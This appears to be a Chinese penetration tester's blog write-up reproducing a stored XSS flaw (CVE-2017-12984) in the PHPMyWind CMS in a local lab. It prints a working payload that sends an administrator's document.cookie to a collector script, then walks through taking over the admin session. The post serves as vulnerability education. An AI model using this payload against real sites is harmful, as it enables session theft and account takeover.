存储型XSS的危害

众所周知，我们一般将XSS分为三类，反射型、存储型、DOM型，反射型XSS这个基本可以说是没什么利用价值，因为它是不能留存下来的，你改变数据执行了一个临时的XSS，但这个数据没有存储到服务器、数据库中，不能再次展示给别人看，其他人进入同一页面请求服务器并不受你的脚本影响，DOM型XSS也是一样，它就是通过影响前端的DOM环境来执行一些js脚本，执行的脚本并没有留存下来，所以危害比较大的还是存储型XSS，也叫永久型XSS。

平常在我的渗透测试工作过程中，不管是什么类型的XSS问题，验证存在XSS问题也就js一小段脚本弹一个框，证明存在即可，但实际上，作为一名高级渗透测试人员肯定是要知道对于存储型XSS，针对这种漏洞，如何搭建环境接受跨站攻击获取的数据和利用的一整套流程。另外再补充下，只要是能让你输入的地方，留言、评论甚至URL上的参数等，你都可以试一下，还有验证XSS时候，不要只会一个<script>去alert，用<img>报错执行、<a>超链接执行javascript伪协议都可以，实际上将<、>这种特殊符号及编码过滤就已经能解决XSS很多问题了。

这次来复现的漏洞是存储型XSS，它的CVE编号是CVE-2017-12984，它是一套基于php环境的CMS系统——PHPMwWind，漏洞版本号<=5.4，所以这里的系统我还是放在phpstudy这套集成环境里，漏洞位置位于用户留言功能里。

安装不说了，看下这个漏洞存在的位置在于message.php虽然对于用户的留言进行了实体编码过滤，这使得js脚本仅对于当前页面无法执行content的脚本内容，但是它任然被正常插入存到数据库中。

但真正的使这个脚本产生影响的就是位于/admin/message_update.php后台管理页面，未将content内容做任何处理，就直接取出来显示，造成的跨站脚本攻击。

首先漏洞验证，这个我不贴图了，payload就<img src=0 onerror = alert(/xss/);>就行了；输入的是在用户留言页面，产生的XSS是在管理员的留言功能管理页，点击修改即可触发。

再次，我们插入攻击脚本攻击获取的数据怎么接收，你得需要写个简单的test.php脚本去接收数据，你可以自己去搞一套云服务器环境，这里我为了方便，就和本地环境放一起了，这里用的是php脚本，肯定需要在php的环境下接收，脚本内容如下：

这很清楚了，通俗易懂，接收到获取的参数c的值，然后把它写到getC.txt中，就是这么简单，再在同一目录下建个getC.txt等着收数据就行了，先测试检查下是否可行，URL加个参数值cc，打开getC.txt查看没问题。

好了，现在构造我们的攻击脚本，这里我是利用报错执行方法，添加一个img字节点，设置它的属性，图片来源为我们接受数据脚本的地址，而取得的cookie却是查看这段代码用户的cookie：

<img src = x onerror

=document.body.appendChild(document.createElement('img')).setAttribute('src','http://localhost/test.php?c='+document.cookie);>

登录后台管理员，进入留言管理模块，点击留言修改按钮，触发XSS，这里为什么两个图片标记，第一个使我们插入的<img>图片标签，第二个是我们的onerror执行的脚本内容，添加子元素节点标签<img>，因为跨站脚本(XSS)能够执行，所以我们这个子元素<img>标签能添加，可以看到第二个标签src来源是我的cookie接受的脚本，我的参数c已经获取到了我要的cookie，为什么能够传过去，因为网页要加载这个<img>图片，它需要向它的源服务器进行GET请求，所以就会将我获得的cookie以GET参数传过去。

现在检查一下我获取的数据小文本getC.txt有没有得到，果然：

会话凭证cookie已得到，剩下的就简单了，老兵cookie欺骗工具，放入我们拿到手的cookie，成功进入管理员后台，这就是恶意攻击者利用跨站脚本窃取会话凭证的大致流程，也证明了它的危害。